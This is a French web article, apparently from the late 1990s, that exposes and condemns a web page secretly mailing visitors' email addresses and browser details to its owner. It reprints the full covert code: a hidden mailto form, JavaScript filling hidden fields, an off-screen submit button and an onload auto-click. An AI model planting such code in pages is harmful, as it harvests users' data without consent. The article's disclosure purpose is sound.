Dans notre très théorique paranoïa, il nous manquait quelques exemples concrets d'intrusion caractérisée dans votre vie privée. En particulier, nous nous demandions s'il existait un moyen de récupérer l'adresse eMail des utilisateurs sans leur accord.

Et c'est sur le somptueux site des Fourmis (dans la rubrique Crédits) que nous avons découvert cette belle saloperie... et tenez-vous bien, c'est d'une simplicité biblique, n'importe qui peut utiliser un tel système (au risque bien sûr de se faire copieusement insulter).

Le principe général : fabriquer un formulaire (en HTML), et déclencher un petit Javascript qui «clique» tout seul sur le bouton «envoyer».

Nous allons commenter ici le code source de la page en question, pour vous démontrer à quel point c'est enfantin.

Suite à cet article, W Multimédia a supprimé le code incriminé de sa page ; y'a des jours comme ça, on reprend confiance... Du coup, on vous a trouvé un autre exemple !

Créer le formulaire

<FORM NAME="forma" METHOD="get" ACTION="mailto:wmulti@imaginet.fr" ENCTYPE="text/plain">

Ici on déclare le formulaire ; l'ACTION consiste donc à envoyer le contenu du formulaire à l'adresse wmulti@imaginet.fr.

<INPUT TYPE="hidden" name=fecha> <INPUT TYPE="hidden" name=referrer> <INPUT TYPE="hidden" name=agent> <INPUT TYPE="hidden" name=name> <INPUT TYPE="hidden" name=version> <INPUT TYPE="hidden" name=code>

Là sont fabriqués 6 champs, totalement invisibles pour l'utilisateur (TYPE="hidden"). Un nom différent est assigné à chacun de ces champs, afin de pouvoir ensuite les «remplir» à partir d'un Javascript.

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

Oh, pas moins de 17 retours à la ligne ! En effet, le bouton (code suivant) ne peut être caché, aussi autant le rejeter hors de l'écran en provoquant un énorme espacement vertical.

<INPUT TYPE="submit" name="button" value="" color="#FFFFFF"> </FORM>

Et voilà l'ultime élément du formulaire, le bouton «submit», le seul élément visible (à condition, on l'a vu, de faire dérouler l'écran vers une zone apparemment vide).

Bien entendu, la VALUE est vide, histoire de réduire le bouton à sa taille minimale.

Remplir le formulaire

Le formulaire, seul, n'est pas très utile : les 6 cases ne contiennent rien, et surtout il faut que l'utilisateur clique lui-même sur le bouton pour déclencher l'envoi du courrier.

Le Javascript suivant va donc «remplir les cases»:

<SCRIPT LANGUAGE="JavaScript"> function envia() { document.forma.referrer.value=document.referrer; document.forma.agent.value=navigator.userAgent; document.forma.name.value=navigator.appName; document.forma.version.value=navigator.appversion; document.forma.code.value=navigator.CodeName; Todays = new Date(); document.forma.fecha.value = "" + Todays.getDate() +"/"+ (Todays.getMonth()+ 1) + "/" + Todays.getYear() + " ; " + Todays.getHours() + ":" + Todays.getMinutes() + ":" + Todays.getSeconds();

Sont ainsi installés dans les 6 cases du formulaire :

• l'adresse de la page qui a renvoyé à la page qui contient le formulaire ;
• le nom du logiciel utilisé, par exemple Mozilla/3.01 (Macintosh; I; PPC) ;
• la marque du logiciel utilisé, par exemple Netscape ;
• le numéro de la version du butineur ;
• le nom de code du butineur ;
• la date de la consultation de la page.

La fin du script, ci-dessous, clique sur le bouton «submit» (envoyer).

document.forma.button.click() return true; } </SCRIPT>

Déclencher le script

<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#000075" onload="envia()">

Le déclenchement du script se situe dans la déclaration BODY de la page, grâce à la commande onload="envia()".

Le but de la manœuvre

On pensait jusqu'ici qu'il n'était pas possible de poster automatiquement un message électronique grâce à Javascript (il n'existe pas de telle commande). Ici cette limitation est contournée, puisque le script n'envoie pas, seul, le message ; il se contente de «cliquer» sur le bouton «Envoyer» généré simplement en HTML.

A moins d'avoir demandé à être informé de l'envoi d'un message par Netscape, tout cela est presque transparent... suffisamment transparent en tout cas pour que la plupart des utilisateurs ne décèlent pas le truc.

Les gens de chez W Multimédia reçoivent donc un eMail contenant la description de votre navigateur, la date de votre visite, et surtout (c'est la grande nouveauté) votre adresse eMail.

Interrogé à ce sujet, W Multimédia nous a assuré de sa bonne foi, arguant que le système sert uniquement à comptabiliser le nombre de visites sur la page des crédits (un compteur tout con est bien plus efficace), et à se renseigner sur le pourcentage d'utilisateurs munis de Netscape. Pour le coup, c'est totalement con, car seuls les utilisateurs de Netscape sont ainsi répertoriés (ce système dénombrerait donc 100% d'utilisateurs de Netscape).

Et surtout, le code démontre que tout est fait pour que cela se fasse «en douce», et absolument rien ne prévient le visiteur qu'on vient de lui piquer son adresse eMail.

C'est donc, clairement, un procédé sournois et dégueulasse. Merci les Fourmis !

ARNO*,
du Scarabée

et Virgile,
des Ours.

Si je clique là, y s'passe quoi ?